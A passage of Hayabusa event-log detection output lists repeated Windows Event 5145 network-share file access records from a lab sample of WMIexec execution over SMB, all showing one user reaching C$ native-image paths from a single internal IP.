0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb#\b00bc572c066b64da974fc25989bc647 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136#\d5147e76aac8b85f995ed7aeb6936907 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#\92502f352b3e8ec57c8956a28e4dea98 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\d9659b5db4bc25a33861dbc0ca19c837 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b#\adfb2cd1f200788f6e0472379725ce7f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62#\379936827e72fda4d66f53769c06c9ee | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b#\4a462e10f0ca871771e1eba0d4708e2e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777#\ab7fb35e2fb3e61e15dcaabbd82b7508 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c#\97871d486d086e08c66cb7bf9335e012 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04#\931ade8881fd66e64743490a332ca6a8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749#\cba0b74c99ed7ace30d99b1ed03059e9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0#\1ccd3b57c9350fc1afa3ed354290f755 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0#\0cf0db1a6758c7e0c0ba05029f155cfa | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207#\1c10bd935ecce56f3dada604138983f2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#\9c705405cffb72e6df411a91a2c062c7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc#\88a7ae331deac4585f47de7e6e4277dc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c#\e2e911ae8e5924a9ef63135cd8c6b797 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9#\f8a02123f968d1ae6940ac5d6a1dd485 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4#\e4a04c178babbb8bb5aaf6d60b47d649 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9#\d90607e7c895999c98edb4043f0073e5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\fab34eeddd8d0d9679cce669b2cff4fe | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f#\1a33211365967c012f504ade4abce1ed | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591#\f21bca07e5816f88c1107f51e64caa60 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439#\fb6f372260a08811a4ca7666c60e31e8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC\8dd5d48acfdc4ce750166ebe36623926 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 